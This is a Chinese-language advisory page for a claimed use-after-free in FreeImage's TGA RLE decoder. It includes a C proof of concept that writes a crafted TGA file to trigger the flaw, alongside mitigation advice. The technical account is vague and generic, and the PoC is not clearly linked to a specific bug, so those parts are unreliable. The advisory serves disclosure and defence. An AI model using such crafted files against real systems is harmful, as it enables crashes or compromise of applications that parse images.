CVE-2025-70968 FreeImage loadRLE() 使用后释放漏洞

漏洞信息

漏洞编号

CVE-2025-70968

漏洞类型

Use After Free（使用后释放）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FreeImage 3.18.0

漏洞概述

CVE-2025-70968是FreeImage 3.18.0版本中的一个高危安全漏洞，位于PluginTARGA.cpp文件的loadRLE()函数中。该漏洞属于Use After Free（UAF）类型，即内存释放后被继续使用。攻击者可以通过构造恶意的TGA图像文件，触发该漏洞。当FreeImage解析特制的TGA文件时，loadRLE()函数在处理RLE压缩数据过程中可能释放某个内存对象后，仍然保留并访问该内存地址，导致敏感信息泄露或代码执行风险。此漏洞CVSS评分高达9.8，属于严重级别，无需任何认证或用户交互即可远程利用，对系统机密性、完整性和可用性均造成严重影响。建议受影响用户尽快升级到最新版本或采取临时缓解措施。

技术细节

FreeImage是一个广泛使用的开源图像处理库，支持多种图像格式。漏洞存在于src/FreeImage/PluginTARGA.cpp的loadRLE()函数中。该函数负责解析TGA图像文件的RLE（Run-Length Encoding，游程长度编码）压缩数据。在处理RLE压缩像素数据时，函数可能错误地释放了某个内存块（例如像素缓冲区或临时变量），但在后续代码执行路径中仍然尝试访问该已释放的内存地址。攻击者可以通过精心构造包含畸形RLE压缩数据的TGA文件来触发此漏洞。当FreeImage库处理此类恶意图像时，可能导致以下后果：1）读取已释放内存中的残留数据（信息泄露）；2）触发内存破坏，可能导致程序崩溃（拒绝服务）；3）在特定条件下可能实现代码执行。由于该库常被各类应用程序调用以处理图像，因此该漏洞影响范围广泛。

攻击链分析

STEP 1

1

攻击者创建包含畸形RLE压缩数据的恶意TGA图像文件

STEP 2

2

目标系统使用FreeImage库加载该恶意TGA文件

STEP 3

3

loadRLE()函数解析RLE数据时错误释放内存对象

STEP 4

4

函数后续代码继续访问已释放的内存地址（Use After Free）

STEP 5

5

触发内存破坏，导致信息泄露、代码执行或服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-70968 PoC - FreeImage loadRLE() Use After Free
 * Generate malicious TGA file to trigger UAF in loadRLE()
 * Usage: gcc -o poc poc.c && ./poc
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct {
    unsigned char id_length;
    unsigned char color_map_type;
    unsigned char image_type;
    unsigned short color_map_origin;
    unsigned short color_map_length;
    unsigned char color_map_depth;
    unsigned short x_origin;
    unsigned short y_origin;
    unsigned short width;
    unsigned short height;
    unsigned char bits_per_pixel;
    unsigned char image_descriptor;
} TGA_HEADER;
#pragma pack(pop)

void generate_malicious_tga(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to open file");
        return;
    }

    TGA_HEADER header = {0};
    header.image_type = 10;  // RLE compressed true-color
    header.width = 256;
    header.height = 256;
    header.bits_per_pixel = 32;
    header.image_descriptor = 0x20;

    fwrite(&header, sizeof(TGA_HEADER), 1, fp);

    // Malformed RLE data to trigger UAF in loadRLE()
    unsigned char rle_packet[512];
    memset(rle_packet, 0x41, sizeof(rle_packet));
    
    // Craft RLE packets that cause memory management issues
    for (int i = 0; i < 4; i++) {
        rle_packet[i * 128] = 0x80 | 127;  // RLE repeat packet
        fwrite(rle_packet, 128, 1, fp);
    }

    fclose(fp);
    printf("Malicious TGA file created: %s\n", filename);
}

int main() {
    generate_malicious_tga("cve-2025-70968 poc.tga");
    printf("PoC for CVE-2025-70968 generated\n");
    return 0;
}

影响范围

FreeImage < 3.18.0

FreeImage 3.18.0

防御指南

临时缓解措施

在官方修复发布前，建议采取以下临时措施：1）限制应用程序处理来自不可信来源的TGA图像文件；2）使用杀毒软件或文件安全扫描工具对上传的图像文件进行检测；3）启用ASLR（地址空间布局随机化）和DEP（数据执行保护）等系统级安全防护；4）考虑使用沙箱环境隔离图像处理功能；5）监控应用程序日志，关注异常崩溃或内存访问错误。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-70968
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-70968
3 Details https://www.cvedetails.com/cve/CVE-2025-70968/
4 VulDB https://vuldb.com/cve/CVE-2025-70968
5 Link https://github.com/MiracleWolf/FreeimageCrash/tree/main